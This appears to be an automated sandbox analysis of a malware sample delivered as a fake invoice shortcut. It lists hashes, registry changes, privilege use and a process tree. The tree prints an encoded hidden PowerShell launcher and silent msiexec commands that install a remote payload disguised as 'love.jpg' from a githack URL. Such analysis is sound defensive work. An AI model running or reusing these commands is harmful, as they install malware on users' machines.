Analysis
- max time kernel: 31s
- max time network: 75s
- platform: windows7_x64
- resource: win7-20230703-en
- resource tags: arch:x64, arch:x86, image:win7-20230703-en, locale:en-us, os:windows7-x64, system
- submitted: 10-07-2023 13:08
Static task
- static1

Behavioral tasks
- behavioral1: Sample Invoices.lnk, Resource win7-20230703-en
- behavioral2: Sample Invoices.lnk, Resource win10v2004-20230703-en
- behavioral3: Sample Res/TVPSkin.dll, Resource win7-20230703-en
- behavioral4: Sample Res/TVPSkin.dll, Resource win10v2004-20230703-en
- behavioral5: Sample Res/hskin.dll, Resource win7-20230703-en
- behavioral6: Sample Res/hskin.dll, Resource win10v2004-20230703-en
- behavioral7: Sample Res/tvp.exe, Resource win7-20230703-en
General
- Target: Res/tvp.exe
- Size: 228KB
- MD5: de2052aae5a5915d09d9d1ede714865c
- SHA1: 2161a471b598ea002fc2a1cc4b65dbb8da14a88e
- SHA256: 1d3f51b33070b5b8f11c891bb160f5f737151f3a36c2e24f96c2844b089a5294
- SHA512: 914eb403bc0662266e9b00f52da192463ae782c301be5279579fe88924451fa8b38a9cc9e689499ae7240259e7c03310980f06a5f7cd1b90bda0b3948fb5d1b3
- SSDEEP: 3072:0QUurm/I/Pc1fsrHxbGL+9QD2pkIanLqf0bAadkp2guonxKzjMMDE0BB6p2wkLqj:lRrXECWDianeuonmRankL
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  Processes (flow | pid | process):
  4 | 2704 | msiexec.exe
  6 | 2704 | msiexec.exe
  7 | 2704 | msiexec.exe

- Use of msiexec (install) with remote resource (3 IoCs)
  Processes (pid | process):
  2124 | msiexec.exe
  2568 | msiexec.exe
  2420 | msiexec.exe

- Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

- Modifies registry class (10 IoCs)
  Processes (description | ioc | process):
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open | tvp.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe %1" | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open | tvp.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe -dvd %1" | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell | tvp.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd | tvp.exe

- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes (pid | process):
  2984 | PowerShell.exe (6 events)
  2872 | powershell.exe
  2936 | powershell.exe
  2040 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 2984 | PowerShell.exe
  Token: SeDebugPrivilege | 2872 | powershell.exe
  Token: SeDebugPrivilege | 2936 | powershell.exe
  Token: SeDebugPrivilege | 2040 | powershell.exe
  Token: SeShutdownPrivilege | 2568 | msiexec.exe
  Token: SeShutdownPrivilege | 2124 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2568 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2124 | msiexec.exe
  Token: SeShutdownPrivilege | 2420 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2420 | msiexec.exe
  Token: SeRestorePrivilege | 2704 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 2704 | msiexec.exe
  Token: SeSecurityPrivilege | 2704 | msiexec.exe
  Token: SeCreateTokenPrivilege | 2568 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 2568 | msiexec.exe
  Token: SeLockMemoryPrivilege | 2568 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2568 | msiexec.exe
  Token: SeMachineAccountPrivilege | 2568 | msiexec.exe
  Token: SeTcbPrivilege | 2568 | msiexec.exe
  Token: SeSecurityPrivilege | 2568 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 2568 | msiexec.exe
  Token: SeLoadDriverPrivilege | 2568 | msiexec.exe
  Token: SeSystemProfilePrivilege | 2568 | msiexec.exe
  Token: SeSystemtimePrivilege | 2568 | msiexec.exe
  Token: SeProfSingleProcessPrivilege | 2568 | msiexec.exe
  Token: SeIncBasePriorityPrivilege | 2568 | msiexec.exe
  Token: SeCreatePagefilePrivilege | 2568 | msiexec.exe
  Token: SeCreatePermanentPrivilege | 2568 | msiexec.exe
  Token: SeBackupPrivilege | 2568 | msiexec.exe
  Token: SeRestorePrivilege | 2568 | msiexec.exe
  Token: SeShutdownPrivilege | 2568 | msiexec.exe
  Token: SeDebugPrivilege | 2568 | msiexec.exe
  Token: SeAuditPrivilege | 2568 | msiexec.exe
  Token: SeSystemEnvironmentPrivilege | 2568 | msiexec.exe
  Token: SeChangeNotifyPrivilege | 2568 | msiexec.exe
  Token: SeRemoteShutdownPrivilege | 2568 | msiexec.exe
  Token: SeUndockPrivilege | 2568 | msiexec.exe
  Token: SeSyncAgentPrivilege | 2568 | msiexec.exe
  Token: SeEnableDelegationPrivilege | 2568 | msiexec.exe
  Token: SeManageVolumePrivilege | 2568 | msiexec.exe
  Token: SeImpersonatePrivilege | 2568 | msiexec.exe
  Token: SeCreateGlobalPrivilege | 2568 | msiexec.exe
  Token: SeCreateTokenPrivilege | 2420 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 2420 | msiexec.exe
  Token: SeLockMemoryPrivilege | 2420 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2420 | msiexec.exe
  Token: SeMachineAccountPrivilege | 2420 | msiexec.exe
  Token: SeTcbPrivilege | 2420 | msiexec.exe
  Token: SeSecurityPrivilege | 2420 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 2420 | msiexec.exe
  Token: SeLoadDriverPrivilege | 2420 | msiexec.exe
  Token: SeSystemProfilePrivilege | 2420 | msiexec.exe
  Token: SeSystemtimePrivilege | 2420 | msiexec.exe
  Token: SeProfSingleProcessPrivilege | 2420 | msiexec.exe
  Token: SeIncBasePriorityPrivilege | 2420 | msiexec.exe
  Token: SeCreatePagefilePrivilege | 2420 | msiexec.exe
  Token: SeCreatePermanentPrivilege | 2420 | msiexec.exe
  Token: SeBackupPrivilege | 2420 | msiexec.exe
  Token: SeRestorePrivilege | 2420 | msiexec.exe
  Token: SeShutdownPrivilege | 2420 | msiexec.exe
  Token: SeDebugPrivilege | 2420 | msiexec.exe
  Token: SeAuditPrivilege | 2420 | msiexec.exe
  Token: SeSystemEnvironmentPrivilege | 2420 | msiexec.exe
  Token: SeChangeNotifyPrivilege | 2420 | msiexec.exe

- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes (pid | process):
  3048 | tvp.exe (3 events)

- Suspicious use of WriteProcessMemory (37 IoCs)
  Processes (description | pid | process | target process), repeated events collapsed with their count:
  PID 3048 wrote to memory of 2984 | 3048 | tvp.exe | PowerShell.exe (4 events)
  PID 2984 wrote to memory of 2872 | 2984 | PowerShell.exe | powershell.exe (4 events)
  PID 2984 wrote to memory of 2936 | 2984 | PowerShell.exe | powershell.exe (4 events)
  PID 2984 wrote to memory of 2040 | 2984 | PowerShell.exe | powershell.exe (4 events)
  PID 2936 wrote to memory of 2124 | 2936 | powershell.exe | msiexec.exe (7 events)
  PID 2040 wrote to memory of 2420 | 2040 | powershell.exe | msiexec.exe (7 events)
  PID 2872 wrote to memory of 2568 | 2872 | powershell.exe | msiexec.exe (7 events)
Processes
(tree order; indentation shows parent/child depth)

- C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe (PID 3048)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe (PID 2984)
    Command line: PowerShell -nop -exec bypass -w Hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQANAAoAewANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAIAAnAG0AcwBpAGUAeABlAGMAIAAvAGkAIABoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwA2ADIAOABmAHIAQQBMAHQAQQBjAG0ATwAvAG0AYQBpAG4ALwBsAG8AdgBlAC4AagBwAGcAIAAvAHEAJwANAAoAfQANAAoA
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2872)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\msiexec.exe (PID 2568)
        Command line: "C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
        - Use of msiexec (install) with remote resource
        - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2936)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\msiexec.exe (PID 2124)
        Command line: "C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
        - Use of msiexec (install) with remote resource
        - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2040)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\msiexec.exe (PID 2420)
        Command line: "C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
        - Use of msiexec (install) with remote resource
        - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\msiexec.exe (PID 2704)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VVZXYY6XNVG4UMGZK0FS.temp
  Filesize: 7KB
  MD5: a55dfd39aaea78864b54062336cd1c6c
  SHA1: 8d94a26472d74f85f49271886562e874043d6a1c
  SHA256: a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5
  SHA512: b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: a55dfd39aaea78864b54062336cd1c6c
  SHA1: 8d94a26472d74f85f49271886562e874043d6a1c
  SHA256: a07366802e5c81022c531b5c8d3bb4e7d7b67b8f8e3a52b7b2a5443252ac3ba5
  SHA512: b7622be23fad02760d0de0c8200b442f219cfc11369d50e43d39975bdc40aa9e21ca94525854ed3a59fc1734c1ec71541569967ebbeeaaae75dcfb66ab9f0c37
- memory/2936-71-0x0000000002780000-0x00000000027C0000-memory.dmp
  Filesize: 256KB

- memory/2984-58-0x0000000002710000-0x0000000002750000-memory.dmp
  Filesize: 256KB

- memory/2984-59-0x0000000002710000-0x0000000002750000-memory.dmp
  Filesize: 256KB

- memory/3048-54-0x0000000000020000-0x000000000003F000-memory.dmp
  Filesize: 124KB